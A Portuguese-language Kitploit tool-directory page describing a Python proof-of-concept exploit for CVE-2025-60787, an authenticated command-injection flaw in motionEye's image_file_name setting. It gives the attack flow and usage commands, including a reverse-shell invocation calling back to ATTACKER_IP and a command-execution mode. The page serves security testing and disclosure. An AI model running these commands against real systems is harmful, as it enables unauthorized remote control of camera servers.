Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-60787-POC — Python PoC para CVE-2025-60787, RCE por injeção de comando no SO autenticada em motionEye <= 0.43.1b4 através da configuração image_file_name não sanitizada | Kitploit
Ferramentas/GitHubGitHub/d3vn0mi/cve-2025-60787-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed TeamingDesenvolvimento de Payloads
GitHubd3vn0mi/cve-2025-60787-poc

CVE-2025-60787-POC

Python PoC para CVE-2025-60787, RCE por injeção de comando no SO autenticada em motionEye <= 0.43.1b4 através da configuração image_file_name não sanitizada

Ver Repositório
2há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-60787 - motionEye RCE Autenticado

Execução Remota de Código Autenticada em motionEye <= 0.43.1b4 via parâmetro de configuração não sanitizado

Autor: d3vn0mi


Visão Geral da Vulnerabilidade

CampoDetalhes
ID CVECVE-2025-60787
Pontuação CVSS7.2 (Alto)
TipoInjeção de Comandos do SO (CWE-78)
AfetadomotionEye <= 0.43.1b4
Corrigido em0.43.1b5

motionEye aceita strings arbitrárias em campos de configuração como image_file_name e as escreve diretamente nos arquivos de configuração do Motion (/etc/motioneye/camera-*.conf). Quando o serviço Motion reinicia, ele interpreta esses campos como strings expansíveis pelo shell, permitindo que um atacante autenticado injete e execute comandos arbitrários do sistema operacional.

A interface web inclui validação no lado do cliente para esses campos, mas isso pode ser trivialmente contornado enviando requisições de API maliciosas diretamente.

Fluxo do Ataque

  1. Autenticar-se no motionEye com credenciais de administrador válidas
  2. Obter a lista de configurações da câmera
  3. Enviar uma requisição POST com uma configuração modificada contendo um valor malicioso em image_file_name
  4. O Motion processa o comando injetado ao capturar snapshots (via capture_mode: interval-snapshots)

Requisitos

  • Python 3.6+
  • biblioteca requests
  • Credenciais de administrador válidas do motionEye
  • Acesso de rede à instância alvo do motionEye

Instalação

root@kitploit:~
git clone https://github.com/d3vn0mi/CVE-2025-60787-POC.git
cd CVE-2025-60787-POC
pip install -r requirements.txt

Uso

O exploit suporta dois modos: reverse shell e execução de comandos.

Reverse Shell

Inicie um listener na sua máquina e então execute:

root@kitploit:~
python3 exploit.py revshell \
    --url http://TARGET:8765 \
    --user admin \
    --password SECRET \
    -i ATTACKER_IP \
    --port 4444

Execução de Comandos

root@kitploit:~
python3 exploit.py command \
    --url http://TARGET:8765 \
    --user admin \
    --password SECRET \
    -e "id; whoami"

Opções

FlagDescrição
--urlURL do motionEye alvo, incluindo a porta
--userNome de usuário do motionEye
--passwordSenha do motionEye
-i / --hostIP do listener (modo revshell)
--portPorta do listener (modo revshell)
-e / --execComando a executar (modo command)
--camera-idEspecificar um ID de câmera alvo
--shUsar /bin/sh em vez de /bin/bash
--no-verifyIgnorar verificação de certificado TLS
--proxyRotear tráfego através de um proxy (ex.: http://127.0.0.1:8080)

Referências

  • Advertência do GitHub - GHSA-j945-qm58-4gjx
  • Exploit-DB #52481
  • Módulo Metasploit da Rapid7
  • Projeto motionEye

Créditos

  • d3vn0mi - Desenvolvimento do exploit e ferramentas
  • gunzf0x - Descoberta e pesquisa original do CVE

Aviso Legal

Esta ferramenta é fornecida apenas para testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. O autor não assume nenhuma responsabilidade pelo uso inadequado deste software. Sempre obtenha a devida autorização antes de testar.

Licença

Este projeto está licenciado sob a Licença MIT.

Baixar ferramenta